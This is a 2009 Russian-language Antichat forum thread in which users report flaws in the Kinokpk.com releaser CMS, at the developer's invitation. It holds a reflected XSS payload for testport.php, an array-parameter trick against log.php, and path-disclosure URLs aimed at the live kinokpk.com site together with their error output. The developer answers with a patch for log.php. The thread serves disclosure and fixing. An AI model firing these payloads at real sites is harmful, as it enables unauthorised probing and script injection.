ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Kinokpk.com releaser
  #1  
Старый 25.08.2009, 12:09
Аватар для vano793
vano793
Новичок
Регистрация: 07.12.2008
Сообщений: 4
Провел на форуме:
10412

Репутация: 1
Talking Kinokpk.com releaser

Вот ты ZonD80 просил найти пусть ищют дальше
Я начну с 1-ой
PHP код:
testport.php?port=><script>alert(/Hi/)</script
Такая же и на TBDev

Последний раз редактировалось vano793; 25.08.2009 в 12:11..
 
Ответить с цитированием

  #2  
Старый 25.08.2009, 12:17
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

читай все страницы и ты найдеш что в TBDev http://forum.antichat.net/threadnav79705-18-10.html я уже кидал про xss эту

но раз другой двиг (уже с убранными дырами тебе +)
 
Ответить с цитированием

  #3  
Старый 25.08.2009, 12:18
Аватар для vano793
vano793
Новичок
Регистрация: 07.12.2008
Сообщений: 4
Провел на форуме:
10412

Репутация: 1
Smile

Цитата:
Сообщение от HAXTA4OK  
читай все страницы и ты найдеш что в TBDev http://forum.antichat.net/threadnav79705-18-10.html я уже кидал про xss эту
Я это знаю но на днях ZonD80 просил дыры выложить
У меня стоит его движок 2.70 но там есть дырка

Вот что он писал
Цитата:
Сообщение от ZonD80  
Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки.

Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z
 
Ответить с цитированием

  #4  
Старый 27.08.2009, 11:54
Аватар для vano793
vano793
Новичок
Регистрация: 07.12.2008
Сообщений: 4
Провел на форуме:
10412

Репутация: 1
По умолчанию

Пишу в эту тему так как она есть на Kinokpk.com releaser
Нашол HAXTA4OK
PHP код:
/log.php?type[]= 
 
Ответить с цитированием

  #5  
Старый 31.08.2009, 12:30
Аватар для ZonD80
ZonD80
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
25077

Репутация: 4
По умолчанию

vano793 ну про тестпорт, это вранье

а вот про лог спасибо.

log.php
найти:
Код:
  $type = htmlspecialchars($_GET["type"]);
заменить на:
Код:
  $type = htmlspecialchars((string)$_GET["type"]);

Последний раз редактировалось ZonD80; 31.08.2009 в 12:38..
 
Ответить с цитированием

  #6  
Старый 31.08.2009, 13:28
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Раскрытие путей тебе

http://kinokpk.com/requests.php?id[]=28

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

http://kinokpk.com/requests.php?action=vote&voteid[]=28

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216


http://kinokpk.com/details.php?id[]=246

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

http://kinokpk.com/invite.php?id[]=987&type=new

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

Последний раз редактировалось HAXTA4OK; 31.08.2009 в 13:40..
 
Ответить с цитированием

  #7  
Старый 31.08.2009, 22:35
Аватар для ZonD80
ZonD80
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
25077

Репутация: 4
По умолчанию

HAXTA4OK, на сайте-то может быть и так, тут ищутся дырки движка, а не сайта.

Если хочешь поискать на сайте - ищи на http://www.torrentsbook.com
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ